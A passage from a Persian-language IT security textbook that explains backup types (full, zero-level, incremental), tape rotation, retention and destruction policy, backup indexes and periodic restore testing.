ﺑﻌﺪ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ،ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻭ ﺍﺻﻼﺣﻬﺎﻱ ﻻﺯﻡ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺍﻭﻟـﻴﻦ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ ﺗﺤﻠﻴﻞ ﻛﻨﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﭼﻪ ﭼﻴـﺰﻱ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ ،ﺑﻠﻜـﻪ
ﻲ ﺳﺎﺧﺖ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﻫﺪ.ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻭﻗﻔﺔ ﺯﻣﺎﻧ ﹺ
ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﺮﺟﻤﻌﻬﺎﻱ MD5ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻨـﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺯ ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﻣﺎﻫﺮﺍﻧﻪ ﻋﻤﻞ ﻛﻨﻨﺪ .ﻣﺜ ﹰ
ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻳﻜﺘﺎ ﻫﺴﺘﻨﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﮕﻴﺮﻧﺪ .ﺩﺭﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺷﻤﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪ Microsoft
Officeﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺿﺎﻓﻪ ﻧﻤﻲﺷﻮﻧﺪ.
ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥﻫﺎ
ﺳﻪ ﻧﻮﻉ ﻛﻠﻲ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ( ،ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ،ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ.
ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ
ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺭﺍﻳﺎﻧﻪ ﻳﻚ ﻛﭙﻲ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﻣﺸﺎﺑﻪ "ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﺯ ﺻﻔﺮ" ﺍﺳﺖ ،ﺟﺰ ﺍﻳﻨﻜﻪ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ.
118 Customized
٣٠٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ
ﺗﻨﻬﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﺎﺹ )ﻣﺜﻞ ﺍﺻﻼﺡ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺍﺭﺍﻱ ﺿﻌﻒ( ﻳﺎ ﺗﺎﺭﻳﺦ ﺧﺎﺹ )ﻣﺜﻞ ﺗﺎﺭﻳﺦ ﺗﻬﻴـﺔ
ﻻ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺭﺍﻳـﺞ
ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ( ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ .ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﻣﻌﻤﻮ ﹰ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺸﺮﺡ ﺯﻳﺮ ﺍﺳﺖ:
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯ ﻫﻔﺘﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﻫﻔﺘﻪ ﺩﺭ ﻣﻴﺎﻥ؛ ﻭ •
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﺮ ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﭘﺲ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ .ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ •
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻐﻴﻴﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ،ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﭘـﺸﺘﻴﺒﺎﻥ
ﺗﻔﺎﻭﺗﻲ ١١٩ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺍﻛﺜﺮ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺰﺭﮒ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ ﺍﺳـﺎﺱ partitionﻳـﺎ ﺩﻳـﺴﻚﮔـﺮﺩﺍﻥ ﻃﺮﺍﺣـﻲ ﻭ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ.
ﻻ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ .ﺑﺮ ﺍﺳﺎﺱ ﺍﻳـﻦ ﻧﻈﺮﻳـﻪ ﻛـﻪ ﻫـﺮ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺷـﻤﺎ partitionﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻣﻌﻤﻮ ﹰ
ﻣﻲﺩﻫﻴﺪ ﺑﺴﻴﺎﺭ ﭘﺮ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ،ﺑﺮﺧﻲ ﺍﺯ partitionﻫﺎ ﻣﺜﻞ partitionﺳﻴﺴﺘﻢ ﺷﻤﺎ )ﺍﮔﺮ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﺎﺷﻨﺪ( ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺩﺭ
ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﻮﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺠﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺎﻳﺪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣـﻞ ﺑﻬـﺮﻩ ﺑـﺮﺩ ،ﺯﻳـﺮﺍ
ﭘﺸﺘﻴﺒﺎﻥ ﺁﻧﻬﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺕ ﻛﺎﻣﻞ ﺑﻮﺩﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ .ﻫﻤﻴﻨﻄﻮﺭ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻧﺼﺐ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻮﺟـﻮﺩ ﺗﻐﻴﻴـﺮ
ﻛﻨﻨﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺮﺍﻱ partitionﻫﺎﻳﻲ ﻛﻪ ﺟﻬﺖ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻨﺎﺳﺒﺘﺮ
ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ،ﻣﻘﺪﺍﺭ ﻛـﺎﺭﻱ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﺩﺍﺭﺩ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻴﺪ ،ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺼﻮﺭﺕ ﭼﺮﺧﺸﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ.
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻣﺸﺐ ﻧﺒﺎﻳﺪ ﺑﺮ ﺭﻭﻱ ﻧﻮﺍﺭﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻣﺸﺐ ﺧﺮﺍﺏ ﺷﻮﺩ ،ﺷﻤﺎ ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺩ :ﺩﺍﺩﻩﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ
ﺍﻣﺸﺐ )ﭼﻮﻥ ﻧﺎﻗﺺ ﺍﺳﺖ( ،ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ )ﭼﻮﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻥ ﺑﻮﺳـﻴﻠﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻣـﺸﺐ ﺟـﺎﻳﮕﺰﻳﻦ ﺷـﺪﻩ ﺍﺳـﺖ( .ﺑﻄـﻮﺭ ﺍﻳـﺪﻩﺁﻝ
ﺐ ﻫﻔﺘﻪ ﻳﻚ ﻧﻮﺍﺭ ﻣﺠﺰﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ. ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺷﺒﻲ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﻭ ﺑﺮﺍﻱ ﻫﺮ ﺷ ﹺ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻫﻔﺘﻪ ﻳﺎ ﻳﻚ ﻣﺎﻩ ﻃﻮﻝ ﺑﻜﺸﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﺣﺬﻑ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑﻌـﻀﻲ ﺍﺯ ﻧﻮﺍﺭﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻤﺪﺕ ﻳﻜﻬﻔﺘﻪ ،ﺑﻌﻀﻲ ﺭﺍ ﻳﻜﻤﺎﻩ ،ﻭ ﺑﻌﻀﻲ ﺭﺍ ﭼﻨﺪﻳﻦ ﻣﺎﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ۳ﻣﺎﻫـﺔ
ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺁﺭﺷﻴﻮ ﻣﻲﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ﺩﻭﺳﺎﻻﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ،
ﭼﺮﺍﮐﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻛﻪ ﺁﻧﻬﺎ ﺭﻭﺯﻱ ﺑﻜﺎﺭ ﺁﻳﻨﺪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧـﺪﻛﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ .ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ
ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻗﺎﻧﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣﺜﻞ ﺛﺒﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ( ﺭﺍ ﺑـﺮﺍﻱ
ﻳﻚ ﺩﻭﺭﺓ ﺣﺪﺍﻗﻠﻲ ﺍﻟﺰﺍﻣﻲ ﮐﺮﺩﻩ ﺑﺎﺷﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺍﺷﺘﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ ١٢٠ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ
ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻧﻴﺰ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺸﺎﻧﻪﮔﺮ ﻳﺎ ﻓﻬﺮﺳﺖ ﺍﺯ ﺍﺳﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﺮ ﻭﻗﺖ ﺑـﻪ
ﺍﺣﻴﺎﻱ ﻣﺠﺪﺩ ﻳﻚ ﻓﺎﻳﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ،ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﻫﺮ ﻧﻮﺍﺭ ﺭﺍ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﺑﺨﻮﺍﻧﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﺭﺳـﻲ ﻓﻬﺮﺳـﺖ ،ﻧـﻮﺍﺭ
ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ .ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﻫﻢ ﺍﻳﺪﺓ ﺧـﻮﺑﻲ ﺍﺳـﺖ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﻓﻬﺮﺳـﺖ
ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺷﻤﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺣﻴﺎ ﺷﻮﺩ!
ﺍﮔﺮ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﺪﻳـﺪ ﺧﺮﻳـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ،
ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺪﺭﺳﺘﻲ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻫـﻴﭽﻜﺲ ﻭ
ﻫﻴﭻ ﻛﺠﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ .ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺮﺍﻱ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻬﻢ ﻭ ﺣﺘﻲ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺭﺍﻫﺒﺮﻱ ﻓﻀﺎﻳﻲ ﻭ ﻫﻮﺍﻳﻲ ﺍﻳﺎﻻﺕ
ﻣﺘﺤﺪﻩ ) ١٢١(NASAﻫﻢ ﺭﻭﻱ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺣﺪﺍﻗﻞ ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﻛﻞ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺍﺣﻴﺎ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ
ﻣﻲﻛﻨﺪ .ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﻔﺎﻭﺕ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱﻧﺸﺪﻩ ﺷﺮﻭﻉ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻧﻮﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻛﻨﻴـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ
ﺍﻧﺪﺍﺯﻳﺪ ﻳﺎ ﻧﻪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺍﺯ ﺩﺳـﺖ ﺭﻓﺘـﻪﺍﻧـﺪ .ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﻬﺎﻱ
ﻋﻤﻠﻲ ﺑﻬﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﺸﻜﻼﺕ ﻭ ﺣﻞ ﺁﻧﻬﺎ ﻫﺴﺘﻨﺪ.
ﻳﻚ ﺁﺯﻣﺎﻳﺶ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ،ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﻓﺎﻳﻞ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻜﺒﺎﺭ ﺩﺭ ﻫﻔﺘﻪ ﻳﺎ ﻳﻜﺒﺎﺭ ﺩﺭ ﻣﺎﻩ ﻭ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻣﺠـﺪﺩ ﺁﻥ ﺍﺳـﺖ.
ﺍﻳﻨﻜﺎﺭ ﻧﻪ ﺗﻨﻬﺎ ﻣﺸﺨﺺ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺟﺎﻣﻊ ﻫﺴﺘﻨﺪ ،ﺑﻠﻜﻪ ﺗﺠﺮﺑﻪ ﺍﻳﻦ ﺍﺣﻴﺎﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻤﻠﻴـﺎﺕ ﺍﺣﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﺭﺍ ﺑـﺴﻴﺎﺭ
ﺳﺎﺩﻩﺗﺮ ﻛﻨﺪ.
ﺑﺤﺚ ﻣﻔﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺍﺣﻴﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺿﻮﻉ ﻳﻚ ﻛﺘﺎﺏ ﻣﺠﺰﺍ ﺑﺎﺷﺪ -ﻛﺘﺎﺏ ﻛﻮﺭﺗﻴﺲ ﭘﺮﻳﺴﺘﻮﻥ ،١٢٣ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ
ﻭ ﺗﺮﻣﻴﻢ ١٢٤Unixﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﻳﻚ ﻧﻤﻮﻧﺔ ﻋﺎﻟﻲ ﺍﺳﺖ.
ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻧﺘﻘﺎﻝ
